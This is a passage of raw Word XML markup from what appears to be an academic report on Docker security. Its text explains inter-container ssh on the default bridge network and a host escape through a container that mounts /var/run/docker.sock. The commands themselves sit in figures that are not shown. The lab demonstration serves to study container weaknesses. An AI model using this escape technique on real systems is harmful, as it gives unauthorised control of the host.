      </w:r>
      <w:r w:rsidR="00372875">
        <w:t>This implies that external host</w:t>
      </w:r>
      <w:r w:rsidR="00DF2315">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00372875">
        <w:t xml:space="preserve"> that can see the Docker host can also access the </w:t>
      </w:r>
      <w:r w:rsidR="00101276">
        <w:t xml:space="preserve">con_ssh container </w:t>
      </w:r>
      <w:r w:rsidR="005D46E4">
        <w:t>through the port</w:t>
      </w:r>
      <w:r w:rsidR="00A624A2">
        <w:t xml:space="preserve"> shown in figure 39.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0F917" w14:textId="4926DAE8" w:rsidR="00B36E6A" w:rsidRDefault="00B36E6A" w:rsidP="00B36E6A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3607E262" wp14:editId="182E740D">
            <wp:extent cx="4562626" cy="24257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89824" cy="2440160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A8DB5B" w14:textId="28BA1DE8" w:rsidR="00B36E6A" w:rsidRDefault="00B36E6A" w:rsidP="00474094">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc86858631"/>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00564FD8" w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00474094" w:rsidRPr="00474094">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>host ssh to the con_nossh container.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w14:paraId="632BFC24" w14:textId="195B5AC4" w:rsidR="001259BD" w:rsidRPr="001259BD" w:rsidRDefault="003D1736" w:rsidP="001259BD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Alternatively, the con_nossh </w:t>
      </w:r>
      <w:r w:rsidR="007A4A4D">
        <w:t>also accept</w:t>
      </w:r>
      <w:r w:rsidR="0067787C">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007A4A4D">
        <w:t xml:space="preserve"> ssh connections from </w:t>
      </w:r>
      <w:r w:rsidR="005273D7">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00895CEC">
        <w:t>con_ssh container</w:t>
      </w:r>
      <w:r w:rsidR="00863DF4">
        <w:t>, though its ssh port is</w:t>
      </w:r>
      <w:r w:rsidR="006F50C2">
        <w:t xml:space="preserve"> not exposed.</w:t>
      </w:r>
      <w:r w:rsidR="007F2247">
        <w:t xml:space="preserve"> This is</w:t>
      </w:r>
      <w:r w:rsidR="00576200">
        <w:t xml:space="preserve"> mainly</w:t>
      </w:r>
      <w:r w:rsidR="007F2247">
        <w:t xml:space="preserve"> because the </w:t>
      </w:r>
      <w:r w:rsidR="000D72F8">
        <w:t xml:space="preserve">default network bridge does not </w:t>
      </w:r>
      <w:r w:rsidR="007E0F97">
        <w:t xml:space="preserve">filter </w:t>
      </w:r>
      <w:r w:rsidR="006D719B">
        <w:t>traffic</w:t>
      </w:r>
      <w:r w:rsidR="00000B3D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D719B">
        <w:t xml:space="preserve">coming from </w:t>
      </w:r>
      <w:r w:rsidR="000A60C9">
        <w:t>containers connected to the same virtual bridge.</w:t>
      </w:r>
      <w:r w:rsidR="00376404">
        <w:t xml:space="preserve"> Figure </w:t>
      </w:r>
      <w:r w:rsidR="00701943">
        <w:t xml:space="preserve">41 shows </w:t>
      </w:r>
      <w:r w:rsidR="00DA3078">
        <w:t xml:space="preserve">ssh connection </w:t>
      </w:r>
      <w:r w:rsidR="005650A8">
        <w:t>from the ssh exposed container to the non-exposed</w:t>
      </w:r>
      <w:r w:rsidR="001F7688">
        <w:t xml:space="preserve"> container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6A108" w14:textId="23930BD0" w:rsidR="00D15F81" w:rsidRDefault="00735AEB" w:rsidP="00003BBE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FA429CD" wp14:editId="7C79BA53">
            <wp:extent cx="5251450" cy="194310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51450" cy="1943100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38E29C" w14:textId="55E11446" w:rsidR="00B814D5" w:rsidRDefault="00B814D5" w:rsidP="00B814D5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc86858632"/>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B814D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: ssh from con_ssh to con_nossh.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="28339E86" w14:textId="33D50ABD" w:rsidR="001F7688" w:rsidRDefault="008148F2" w:rsidP="001F7688">
      <w:r>
        <w:t xml:space="preserve">Similarly, the attacker (alpine) container </w:t>
      </w:r>
      <w:r w:rsidR="00B337D1">
        <w:t xml:space="preserve">accessed the non-ssh container, as shown </w:t>
      </w:r>
      <w:r w:rsidR="0049463C">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00142C90">
        <w:t>figure 42.</w:t>
      </w:r>
      <w:r w:rsidR="00680756">
        <w:t xml:space="preserve"> At this point, the attacker can exploit the container environment </w:t>
      </w:r>
      <w:r w:rsidR="00F34E35">
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="00597CD3">
        <w:t>updat</w:t>
      </w:r>
      <w:r w:rsidR="00DC0F66">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00597CD3">
        <w:t xml:space="preserve"> packages and necessary tools</w:t>
      </w:r>
      <w:r w:rsidR="00DC0F66">
        <w:t xml:space="preserve">, as </w:t>
      </w:r>
      <w:r w:rsidR="00B57887">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00DC0F66">
        <w:t xml:space="preserve">alpine base image </w:t>
      </w:r>
      <w:r w:rsidR="007E66C7">
        <w:t xml:space="preserve">includes </w:t>
      </w:r>
      <w:r w:rsidR="004A61E0">
        <w:t>most command-line tools</w:t>
      </w:r>
      <w:r w:rsidR="005D2230">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E4A34">
        <w:t xml:space="preserve"> Thus, the attacker can leverage </w:t>
      </w:r>
      <w:r w:rsidR="00C06812">
        <w:t>the features of the alpine</w:t>
      </w:r>
      <w:r w:rsidR="00814372">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00094905">
        <w:t xml:space="preserve">image to further </w:t>
      </w:r>
      <w:r w:rsidR="00494293">
        <w:t xml:space="preserve">his/her </w:t>
      </w:r>
      <w:r w:rsidR="0005151A">
        <w:t>attacks on the compromised container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B60257A" w14:textId="2B0D344E" w:rsidR="00E90005" w:rsidRDefault="00E90005" w:rsidP="00E90005">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F90B1A" wp14:editId="1AE3EB33">
            <wp:extent cx="4874260" cy="22377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74260" cy="2237740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C6436" w14:textId="1B9CAE67" w:rsidR="00F82326" w:rsidRDefault="00F82326" w:rsidP="00A21C92">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc86858633"/>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>42</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A21C92" w:rsidRPr="00A21C92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alpine ssh to the con_nossh container.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="3120C2ED" w14:textId="3D78E552" w:rsidR="00E90005" w:rsidRDefault="007243F0" w:rsidP="00597904">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00C724DA">
        <w:t xml:space="preserve">ttackers </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00C724DA">
        <w:t xml:space="preserve">need to track which </w:t>
      </w:r>
      <w:r w:rsidR="00F5771F">
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F5771F">
        <w:t xml:space="preserve"> or resources they </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">have </w:t>
      </w:r>
      <w:r w:rsidR="00F5771F">
        <w:t>landed</w:t>
      </w:r>
      <w:r>
        <w:t>, especially</w:t>
      </w:r>
      <w:r w:rsidR="00455540">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C29EE">
        <w:t>exploring,</w:t>
      </w:r>
      <w:r w:rsidR="00177E12">
        <w:t xml:space="preserve"> and exploiting</w:t>
      </w:r>
      <w:r w:rsidR="000F0B30">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0016656B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="000F0B30">
        <w:t>Docker environment.</w:t>
      </w:r>
      <w:r w:rsidR="00DB479B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D16E4">
        <w:t xml:space="preserve">In such cases, the attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00230B9F">
        <w:t xml:space="preserve">use the Linux command in figure 43 to </w:t>
      </w:r>
      <w:r w:rsidR="004B3232">
        <w:t>identify the system</w:t>
      </w:r>
      <w:r w:rsidR="00153008">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009D37CB">
        <w:t xml:space="preserve"> The output shows that the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00CC24FD">
        <w:t>landed on a container</w:t>
      </w:r>
      <w:r w:rsidR="00E90FEE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23EB9A" w14:textId="70116653" w:rsidR="00E90FEE" w:rsidRDefault="00E90FEE" w:rsidP="00E90FEE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15C11FC2" wp14:editId="4CA3BC7A">
            <wp:extent cx="4203700" cy="1677101"/>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217585" cy="1682641"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="668F73A3" w14:textId="39181814" w:rsidR="00451839" w:rsidRDefault="00451839" w:rsidP="00471135">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc86858634"/>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00471135" w:rsidRPr="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifying the systems</w:t>
      </w:r>
      <w:r w:rsidR="00471135">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w14:paraId="47864E12" w14:textId="62D2C520" w:rsidR="00471135" w:rsidRDefault="00652D24" w:rsidP="00471135">
      <w:r>
        <w:t xml:space="preserve">So </w:t>
      </w:r>
      <w:r w:rsidR="009302A1">
        <w:t>far,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the attacker is </w:t>
      </w:r>
      <w:r w:rsidR="00DF4B15">
        <w:t>inside</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Docker environment</w:t>
      </w:r>
      <w:r w:rsidR="00F93751">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B65A39">
        <w:t xml:space="preserve"> However,</w:t>
      </w:r>
      <w:r w:rsidR="00F83219">
        <w:t xml:space="preserve"> how can</w:t>
      </w:r>
      <w:r w:rsidR="00B549A8">
        <w:t xml:space="preserve"> the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00342606">
        <w:t>escape</w:t>
      </w:r>
      <w:r w:rsidR="00D310F5">
        <w:t xml:space="preserve"> to the Docker host?</w:t>
      </w:r>
      <w:r w:rsidR="007D17AF">
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:r w:rsidR="00487A27">
        <w:t xml:space="preserve">this instance, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="004E59A9">
        <w:t>launched another container</w:t>
      </w:r>
      <w:r w:rsidR="00C46F8E">
        <w:t xml:space="preserve">, mounting the Docker socket </w:t>
      </w:r>
      <w:r w:rsidR="00DB1F81">
        <w:t xml:space="preserve">to run </w:t>
      </w:r>
      <w:r w:rsidR="005501CD">
        <w:t>Docker commands</w:t>
      </w:r>
      <w:r w:rsidR="005F4BC5">
        <w:t xml:space="preserve"> and access the host system</w:t>
      </w:r>
      <w:r w:rsidR="005501CD">
        <w:t>, as shown in figure 44.</w:t>
      </w:r>
      <w:r w:rsidR="00552405">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00D908EB">
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="002212D0">
        <w:t xml:space="preserve">allows </w:t>
      </w:r>
      <w:r w:rsidR="00B12C67">
        <w:t>the attacker to run Docker commands</w:t>
      </w:r>
      <w:r w:rsidR="00427AE2">
        <w:t xml:space="preserve"> because it is mounted to the Docker daemon socke</w:t>
      </w:r>
      <w:r w:rsidR="00B65A39">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00427AE2">
        <w:t xml:space="preserve"> via API.</w:t>
      </w:r>
      <w:r w:rsidR="00F12C3A">
        <w:t xml:space="preserve"> Simply put, the </w:t>
      </w:r>
      <w:r w:rsidR="00A2698C">
        <w:t>volume /var/run/</w:t>
      </w:r>
      <w:r w:rsidR="00FC363A">
        <w:t xml:space="preserve">docker.sock </w:t>
      </w:r>
      <w:r w:rsidR="00B01DE5">
        <w:t>is shared with the container.</w:t>
      </w:r>
      <w:r w:rsidR="008000F9">
        <w:t xml:space="preserve"> The /var/run/docker.sock is a Unix domain socket that allows </w:t>
      </w:r>
      <w:r w:rsidR="00A239C9">
        <w:t>different processes to communicate</w:t>
      </w:r>
      <w:r w:rsidR="00810813">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F00D62">
        <w:t xml:space="preserve"> Therefore, this container </w:t>
      </w:r>
      <w:r w:rsidR="00C407BA">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="005B4361">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA16B0">
        <w:t xml:space="preserve">run Docker-like things </w:t>
      </w:r>
      <w:r w:rsidR="00C407BA">
        <w:t>on the Docker host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2FB922" w14:textId="2EBC87C2" w:rsidR="002212D0" w:rsidRDefault="002212D0" w:rsidP="00676AEC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52C5B75F" wp14:editId="1282607E">
            <wp:extent cx="5422900" cy="28864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22900" cy="288648"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B0E9FB" w14:textId="2D31B8B9" w:rsidR="00676AEC" w:rsidRDefault="00676AEC" w:rsidP="00C5787D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc86858635"/>
      <w:r w:rsidRPr="00C5787D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
